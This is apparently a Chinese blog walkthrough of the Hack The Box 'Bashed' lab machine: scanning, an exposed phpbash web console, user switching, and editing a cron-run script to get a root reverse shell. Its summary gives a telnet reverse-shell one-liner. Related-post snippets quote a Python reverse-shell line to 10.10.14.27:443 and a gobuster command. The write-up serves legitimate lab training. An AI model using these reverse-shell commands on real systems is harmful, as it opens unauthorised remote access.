hack the box靶场练习之bashed

最新推荐文章于 2024-07-03 16:49:56 发布
最新推荐文章于 2024-07-03 16:49:56 发布
阅读量199 收藏
点赞数 1
分类专栏: Hack The Box 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44767905/article/details/128897569
版权

目录

练习记录

进入主页启动机器:
在这里插入图片描述
对该IP进行端口扫描:
在这里插入图片描述
发现有个80端口,开启了apache httpd2.4.18,访问一下:
在这里插入图片描述
扫一下目录:
在这里插入图片描述
逐个访问后发现在/dev目录下有如下内容:
在这里插入图片描述
访问phpbash.php可得到一个在线的控制台程序
在这里插入图片描述
查询当前用户名:
在这里插入图片描述
查看可以执行sudo的用户或命令:
在这里插入图片描述
发现此处存在一个叫scriptmanager的用户。
尝试获取一个可交互式shell
在这里插入图片描述
在这里插入图片描述
切换用户:

在这里插入图片描述
切换到根目录,查看目录信息:
在这里插入图片描述
发现其中多出了一个叫scripts的目录 打开看看:
在这里插入图片描述
在这里插入图片描述
发现就是个生成txt文档的脚本,尝试修改改脚本使其反弹shell,然后用python运行:
在这里插入图片描述
同时开启nc的4444端口监听:
在这里插入图片描述
最后翻找目录获得user.txt和root.txt,读取内容:
在这里插入图片描述

在这里插入图片描述

总结

1.不同目录的操作权限不同,所以可以多尝试不同目录不同文件,以求获取更高权限。
2.在python、php、bash反弹shell失败后可以尝试telnet:mknod a p; telnet <ip> <port> 0<a | /bin/bash 1>a

cve2022
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HackTheBox-Bashed渗透测试
weixin_43111940的博客
04-13 291
端口信息,只开了80端口 目录扫描 gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' /dev/目录下有php的shell文件 通过执行命令可以判断是Linux系统,因为对命令的大小写敏感 既然可以执行命令,尝试一下用反弹shell命令,尝试了php,Linux的反弹命令,但是没有拿到she
hackthebox-bashed (考点:phpbash,linux修改脚本)
冬萍子癸水
04-11 592
nmap 就一个80. 打开看看都很直白提示了是phpbash 拿dirbuster扫一扫 看到phpbash,点进去。进入网页版bash 把这个shell弹到我本机来 命令有很多,但我试了几个没反应 最后这个OK python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);...
Bashed -- hack the box
neal1991的专栏
04-04 503
IntroductionTarget: 10.10.10.68 (OS: Linux)Kali linux: 10.10.16.44Information Enumera...
Hack the box靶机 bashed
菜浪马废的博客
05-07 346
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp...
HackTheBox::Bashed
aya3t的博客
10-11 426
HackTheBox::Bashed
HTB-hackthebox-Bashed
yutianovo的博客
03-01 471
靶机描述 清单 信息搜集 nmap dirsearch 未受到保护的危险php文件 提权 sudo -l 定时脚本 信息搜集 靶机IP 端口扫描 nmap 10.10.10.68 Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http 80 页面内容如下 介绍了 phpbash https://github.com/Arrexel/phpbash 功能是在 Web 页面里可以像交互式shell 一样进行
murmurhash.c:MurmurHash3通用hash bashed查找函数实现
06-20
MurmurHash3通用hash bashed查找函数实现 关于 是一种非加密哈希函数,适用于一般的基于哈希的查找。 此实现实现了 MurmurHash 的第 3 版。 安装 : $ clib install jwerle/murmurhash.c 来源: $ git clone git@...
shed:不要再次运行“curl | sh”。 在运行之前使用“curl | shed”来验证脚本
06-04
shed - sh 编辑器不要运行curl | sh 再... 在此之后,从终端运行shed或bashed以验证它是否正确安装。例子管道到 sh 使用可疑的curl -pipe-sh 或wget -pipe-sh 命令curl -L https://npmjs.org/install.sh | shwget -qO-
E-commerce-website-in-full-stack-node-js:在这个网络应用程序中,我使用Express js等
05-07
电子商务网站全栈节点js和paypalMVC架构以及套接字编程和资金服务in this webapp is fully bashed on MVC(model,view,controller base web-app) architecture with real time chating features like socket io :-)...
Tetrahedron Mesh generation and optimization
12-06
Tetrahedron Mesh generation and optimization bashed on centroidal Voronoi tessellation.pdf
Haystack - hack the box
neal1991的专栏
11-30 566
Introduction Target: 10.10.10.115(Linux) Kali: 10.10.16.61 HayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanis...
Hackthebox靶场---Undetected 攻略实战(难)
weixin_51339377的博客
04-24 4236
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 1977
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1217
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8321
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 308
IDF版本:4.4.7。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 560
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1057
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
FMEA在大型光伏电站安全生产管理中的应用
tianxingjian713的博客
07-03 422
它通过对产品或过程中可能出现的故障模式进行系统性地梳理和分析,评估其可能的影响程度和发生概率,从而制定相应的预防措施和应对措施,以降低故障发生的可能性和影响程度。FMEA在光伏电站安全生产管理中的应用,主要是通过对电站系统、设备和工艺过程进行全面的故障分析,找出潜在的故障模式和影响,进而制定针对性的预防措施,提高电站的安全性和可靠性。然后,针对每个子系统和设备,分析其可能出现的故障模式及其影响,包括故障对电站运行的影响、对人员安全的影响以及对环境的影响等。在评估故障影响的基础上,需要制定相应的预防措施。
WebKit中的安全新纪元:Web Authentication API深度解析
最新发布
2401_85763639的博客
07-03 674
Web Authentication API是一种新兴的Web标准,旨在使用公钥密码学提供更安全的登录和多因素认证方法。与传统的用户名和密码认证方式相比,WebAuthn提供了一种无密码的认证机制,从而减少了密码泄露和钓鱼攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值